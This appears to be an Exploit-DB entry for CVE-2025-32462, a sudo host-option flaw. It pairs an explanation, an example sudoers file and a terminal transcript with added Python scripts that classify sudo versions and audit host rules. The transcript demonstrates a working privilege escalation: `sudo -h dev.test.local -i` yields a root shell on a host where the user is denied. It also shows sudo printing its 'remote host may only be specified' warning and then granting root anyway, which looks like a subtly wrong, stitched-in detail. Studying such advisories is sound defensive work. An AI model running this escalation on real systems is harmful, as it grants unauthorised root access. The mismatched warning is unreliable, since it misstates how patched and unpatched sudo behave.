Sudo 1.9.17 Host Option – Elevation of Privilege

Exploit Details

Basic Information

Exploit Title Sudo 1.9.17 Host Option – Elevation of Privilege
Exploit ID EDB-ID:52354
Type exploitdb
Published 2025-07-08T00:00:00
Modified 2025-07-08T00:00:00

CVSS Information

CVSS Score 2.8
Severity LOW
Vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N

CVE Information

  • CVE-2025-32462

Exploit Description

Exploit Title: Sudo 1.9.17 Host Option – Elevation of Privilege Date:…

Exploit Code

# Exploit Title: Sudo 1.9.17 Host Option – Elevation of Privilege
# Date: 2025-06-30
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.sudo.ws
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
# Version: Stable 1.9.0 – 1.9.17, Legacy 1.8.8 – 1.8.32
# Fixed in: 1.9.17p1
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
# Blog: https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo 1.9.13p2
# CVE : CVE-2025-32462
#

No exploit is required. The host option (-h/--host) was only intended to be used together with -l to list a user's privileges for another host. Executing a sudo or sudoedit command with the host option referencing an unrelated remote host rule causes Sudo to treat that rule as valid for the local system. As a result, any command allowed by the remote host rule can be executed on the local machine.
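The affected ranges in the header (Stable 1.9.0 – 1.9.17, Legacy 1.8.8 – 1.8.32, fixed in 1.9.17p1) are easy to get wrong by hand because a sudo patchlevel such as 1.9.17p1 sorts after 1.9.17. The following is an added triage helper, not part of the Exploit-DB entry or of sudo itself, that parses the `sudo -V` banner into a comparable tuple and classifies it. The only assumption beyond the header is that the host option first appeared in 1.8.8, which is where the legacy range starts.

```python
"""Classify a `sudo -V` banner against the CVE-2025-32462 affected ranges.

Added example; not part of the Exploit-DB entry or of the sudo project.
Version bounds are taken from the exploit header above.
"""
import re
import subprocess

FIXED = (1, 9, 17, 1)             # 1.9.17p1: first upstream release with the fix
HOST_OPTION_ADDED = (1, 8, 8, 0)  # assumption: -h/--host appeared in 1.8.8 (start of the legacy range)


def parse_sudo_version(banner):
    """'Sudo version 1.9.15p5' -> (1, 9, 15, 5). A missing patchlevel is 0, so 1.9.17 < 1.9.17p1."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", banner)
    if not m:
        raise ValueError("no sudo version found in: " + banner)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def classify(banner):
    """Map a banner to one of: not affected / fixed upstream / affected (...)."""
    v = parse_sudo_version(banner)
    if v < HOST_OPTION_ADDED:
        return "not affected (predates the host option)"
    if v >= FIXED:
        return "fixed upstream"
    if v[:2] == (1, 8):
        return "affected (legacy 1.8.x; no upstream fix in that branch, upgrade)"
    return "affected (upgrade to 1.9.17p1 or a distribution build with the backported fix)"


def local_sudo_banner():
    """First line of `sudo -V`; does not prompt for a password."""
    out = subprocess.run(["sudo", "-V"], capture_output=True, text=True, check=True).stdout
    return out.splitlines()[0]


if __name__ == "__main__":
    banner = local_sudo_banner()
    print(banner, "->", classify(banner))
```

Treat the result as a version heuristic only: distribution packages backport security fixes without bumping the upstream version string (a patched Ubuntu 24.04 build still reports 1.9.15p5), so confirm against the package changelog before calling a host vulnerable or fixed.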

Example /etc/sudoers file using the Host_Alias directive. The lowpriv user is allowed to execute all commands (full root) on dev.test.local and ci.test.local, but not on prod.test.local.

Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local
lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL

Even though the prod.test.local server is explicitly denied for the lowpriv user, root access is achieved by specifying the host option for the dev.test.local or ci.test.local servers.
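Which rules a user can borrow with -h depends on sudoers host-list semantics: items in a list are evaluated and the last item that matches decides, a matching negated item denies, and an item that does not match is simply ignored. That is why `SERVERS, !PROD` denies prod.test.local but still allows dev.test.local. The following added audit script, which is not part of the Exploit-DB entry or of sudo, implements that matching for a small sudoers subset (Host_Alias plus plain user specs; no wildcards, netgroups, CIDR or other alias types) and reports, for a user on a given local host, every other host in the file whose rule would match. The sample input is the sudoers fragment above; the host-list semantics are sudo's, the parser is an assumption-laden approximation meant for triage, not a replacement for `sudo -l -h`.

```python
"""Find sudoers host rules a user could borrow via `sudo -h <host>` on an unpatched sudo.

Added example; not the Exploit-DB entry's code and not sudo's parser. Supports
only Host_Alias lines and user specs of the form `user hostlist = cmndspec`.
"""
import re
import sys

# Constructed sample: the sudoers fragment from the advisory text.
SAMPLE_SUDOERS = """\
Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local
lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL
"""

ALLOW, DENY, UNSPEC = True, False, None  # UNSPEC: the item did not match at all


def parse_sudoers(text):
    """Return (host_aliases, rules); rules are (user, [host items], cmnd spec)."""
    aliases, rules = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("Host_Alias"):
            name, members = line[len("Host_Alias"):].split("=", 1)
            aliases[name.strip()] = [m.strip() for m in members.split(",")]
            continue
        if line.startswith(("User_Alias", "Cmnd_Alias", "Runas_Alias", "Defaults")):
            continue  # not needed for a host audit (subset parser)
        m = re.match(r"(\S+)\s+([^=]+?)\s*=\s*(.+)$", line)
        if not m:
            raise ValueError("unsupported sudoers line: " + raw)
        user, hosts, cmnd = m.groups()
        rules.append((user, [h.strip() for h in hosts.split(",")], cmnd.strip()))
    return aliases, rules


def host_item_matches(item, host, aliases):
    """Evaluate one list item (word, alias, ALL, optionally negated) for host."""
    negated = item.startswith("!")
    name = item.lstrip("!")
    if name == "ALL":
        rc = ALLOW
    elif name in aliases:
        rc = hostlist_matches(aliases[name], host, aliases)
    else:
        # sudo compares the entry against both the long and the short host name
        rc = ALLOW if name in (host, host.split(".", 1)[0]) else UNSPEC
    if rc is UNSPEC:
        return UNSPEC
    return (not rc) if negated else rc


def hostlist_matches(items, host, aliases):
    """sudo semantics: walk the list backwards; the first decisive item wins."""
    for item in reversed(items):
        rc = host_item_matches(item, host, aliases)
        if rc is not UNSPEC:
            return rc
    return UNSPEC


def all_hosts(aliases, rules):
    """Every concrete host name mentioned anywhere in the file."""
    names = set()
    for members in aliases.values():
        names.update(m.lstrip("!") for m in members)
    for _, hosts, _ in rules:
        names.update(h.lstrip("!") for h in hosts)
    names.discard("ALL")
    return names - set(aliases)


def audit(text, user, local_host):
    """Return (local_allowed, {remote host: [cmnd specs]}) for user on local_host."""
    aliases, rules = parse_sudoers(text)
    user_rules = [(hosts, cmnd) for u, hosts, cmnd in rules if u == user]
    local_allowed = any(hostlist_matches(h, local_host, aliases) is ALLOW for h, _ in user_rules)
    borrowable = {}
    for host in sorted(all_hosts(aliases, rules) - {local_host}):
        specs = [cmnd for hosts, cmnd in user_rules if hostlist_matches(hosts, host, aliases) is ALLOW]
        if specs:
            borrowable[host] = specs
    return local_allowed, borrowable


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    user = sys.argv[2] if len(sys.argv) > 2 else "lowpriv"
    host = sys.argv[3] if len(sys.argv) > 3 else "prod.test.local"
    local, borrow = audit(text, user, host)
    print(f"{user} on {host}: {'allowed' if local else 'no matching rule'}")
    for h, specs in borrow.items():
        print(f"  sudo -h {h} would grant: {', '.join(specs)}")
```

Run with no arguments to reproduce the advisory's scenario (lowpriv on prod.test.local gets no local rule but can borrow dev.test.local and ci.test.local); pass a sudoers path, user and local hostname to triage a real file. Any host listed under "would grant" is a rule worth rewriting to be host-independent or removing from that system's sudoers until sudo is patched.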

Example

Show that lowpriv is not allowed to execute sudo on the prod server.

lowpriv@prod:~$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.

List the host rules for the dev.test.local server.

lowpriv@prod:~$ sudo -l -h dev.test.local
Matching Defaults entries for lowpriv on dev:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User lowpriv may run the following commands on dev:
    (root) NOPASSWD: ALL

Execute a root shell on prod.test.local by specifying the -h dev.test.local option. Note that sudo prints its "remote host may only be specified when listing privileges" warning but, as the transcript shows, still starts the login shell as root.

lowpriv@prod:~$ sudo -h dev.test.local -i
sudo: a remote host may only be specified when listing privileges.
root@prod:~# id
uid=0(root) gid=0(root) groups=0(root)
